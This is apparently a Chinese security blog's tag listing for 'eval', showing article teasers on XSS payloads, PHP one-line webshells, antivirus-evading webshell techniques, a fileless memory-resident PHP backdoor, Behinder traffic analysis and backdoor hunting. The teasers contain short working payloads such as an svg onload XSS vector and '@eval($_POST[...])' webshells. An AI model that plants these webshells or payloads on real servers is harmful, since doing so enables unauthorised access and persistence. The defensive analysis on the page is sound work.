XSS-Payloads<!-- 仅适用于反射型XSS --!><svg/onload=eval(name)><!-- 如果你控制了 URL --> <svg...
09月04日57 views评论eval
svg
微小的XSS Payloads集合
09月04日57 views评论eval
svg
09月04日57 views评论eval
svg
实战中SHELL免杀的一些方法(附N个过d盾过狗马)
0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧(另外,人人大佬实战靶场里已经上架了404大佬精心制作的实战对抗靶机了哦,快来体验课程吧)0x02 目录关于eval 于 a...
09月02日125 views评论函数
实战
过狗一句话编写之代码执行漏洞函数代替eval
不知道这个能不能算上奇技淫巧 ,如果算不上的话,请各位前辈提示一下 修改板块..今天下午看坛友发了一个求助贴,让帮忙分析一句话木马呢!原帖链接:https://www.t00ls.net/thread...
07月29日82 views评论代码执行
漏洞
开胃菜:冰蝎2.0流量分析
估计以后应急也遇不到2.0系列了 纪念一下首先客户端以Get形式发起带密码的握手请求,服务端产生随机密钥并写入Session。客户端将源代码,如assert|eval(“phpinfo();”)利用A...
04月15日42 views评论eval
服务端
《Code Injection》 - PHP Eval 代码注入执行
作者:菲 & 2月30日 开始测试 http://cpd.111111.fl.us/gis/reports/output.php?id=ImpactFeesReport&month=a...
04月03日59 views评论code
php
akcms 代码执行漏洞
上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题...
04月03日96 views评论eval
函数
关于eval的劫持操作
前提:本文讨论在chrome浏览器下的情况,由于早期IE浏览器的实现有所不同,导致与本文所提内容存在差异。其它浏览器也未做测试。 在某些需求环境中,我们需要劫持eval函数,输出所eval的内容。对于...
04月03日lcx26 views评论data
浏览器
PHP 无文件后门,驻留在内存中在后台循环执行命令,“不死幽灵”后门
PHP 无文件后门的意思是驻在 php 后台中的 shell。驻留在内存中在后台循环执行命令,可以删掉文件,关掉浏览器,只要服务器进程不重启,可以一直在运行。 nonshell.php eval.tx...
04月03日lcx87 views评论php
txt
如何查找php木马后门高级篇
如何查找php木马后门高级篇 jusker (爱好后门后门分析) | 2014-05-17 11:54 # 在正常的编程中eval不常见,可通过字符串匹配查找eval 常见的是变成 base64_de...
04月02日lcx43 views评论eval
get
利用php新特性过静态查杀
最近在研究webshell免杀,抽出心得的一个新颖的点。原因是突然想到既然php7.1不能利用可变函数的assert,那就利用php7的新特性来绕过查杀正则,最终绕过某盾和“某d0g”。实验环境在7....
03月26日34 views评论php
绕过
如何在Python中使用eval ?
Python中的 eval是什么?在Python中,我们有许多内置方法,这些方法对于使Python成为所有人的便捷语言至关重要,而eval是其中一种。eval函数的语法如下:eval(exp...
09月11日218 views评论eval
python
一些常用的一句话分享
php-基本 <?php eval($_POST[cc123]) ?><?php @eval($_POST['cc123']);?>php变形记 <?php $a = s...
09月04日277 views评论php
post
12
